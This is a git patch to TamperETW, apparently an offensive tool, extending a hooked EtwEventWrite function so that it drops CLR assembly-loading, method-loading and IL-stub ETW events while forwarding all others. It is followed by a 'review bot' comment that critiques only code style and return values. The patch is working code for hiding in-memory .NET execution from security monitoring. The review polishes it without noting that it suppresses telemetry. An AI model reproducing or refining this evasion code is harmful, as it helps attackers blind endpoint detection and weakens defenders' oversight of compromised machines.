From d8c90b5c1e61a1df951f0a96ea777b1b626207dd Mon Sep 17 00:00:00 2001
From: Cn33liz
Date: Thu, 26 Mar 2020 21:38:54 +0100
Subject: [PATCH] Added more CLR ETW blocking rules

---
 TamperETW/UnmanagedCLR/TamperETW.cpp | 24 ++++++++++++++++++------
 1 file changed, 18 insertions(+), 6 deletions(-)

diff --git a/TamperETW/UnmanagedCLR/TamperETW.cpp b/TamperETW/UnmanagedCLR/TamperETW.cpp
index a78080d..ecebbe8 100755
--- a/TamperETW/UnmanagedCLR/TamperETW.cpp
+++ b/TamperETW/UnmanagedCLR/TamperETW.cpp
@@ -3,7 +3,12 @@
 #undef UNICODE
 #define UNICODE
+// https://docs.microsoft.com/en-us/dotnet/framework/performance/etw-events-in-the-common-language-runtime
+#define ModuleLoad_V2 152
 #define AssemblyDCStart_V1 155
+#define MethodLoadVerbose_V1 143
+#define MethodJittingStarted 145
+#define ILStubGenerated 88
 #include
 #include
@@ -34,14 +39,21 @@ ULONG NTAPI MyEtwEventWrite(
 return 1;
 }
- // Block CLR assembly loading events.
- if (EventDescriptor->Id == AssemblyDCStart_V1) {
- return uResult;
+ switch (EventDescriptor->Id) {
+ case AssemblyDCStart_V1:
+ // Block CLR assembly loading events.
+ break;
+ case MethodLoadVerbose_V1:
+ // Block CLR method loading events.
+ break;
+ case ILStubGenerated:
+ // Block MSIL stub generation events.
+ break;
+ default:
+ // Forward all other ETW events using EtwEventWriteFull.
+ uResult = EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);
 }
- // Forward all other ETW events using EtwEventWriteFull.
- uResult = EtwEventWriteFull(RegHandle, EventDescriptor, 0, NULL, NULL, UserDataCount, UserData);
-
 return uResult;
 }
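Review bot: `ModuleLoad_V2` and `MethodJittingStarted` are defined as macros in the first hunk but never referenced by the `switch` in the second hunk, so they are dead definitions; either drop them or annotate why they are kept, e.g. `// reference only - not matched in MyEtwEventWrite`. Since `EventDescriptor->Id` is a `USHORT`, typed constants such as `constexpr USHORT AssemblyDCStart_V1 = 155;` would be preferable to untyped `#define`s for all five IDs, and `nullptr` should replace `NULL` in the `EtwEventWriteFull` call. On the three `break` paths the function returns whatever `uResult` held before the `switch`; its initialisation is outside the hunk, so that value should be confirmed and stated in a one-line comment above the `switch`, as the early `return uResult;` being replaced had the same dependency. `MyEtwEventWrite`'s signature and the start of its body are outside the hunk.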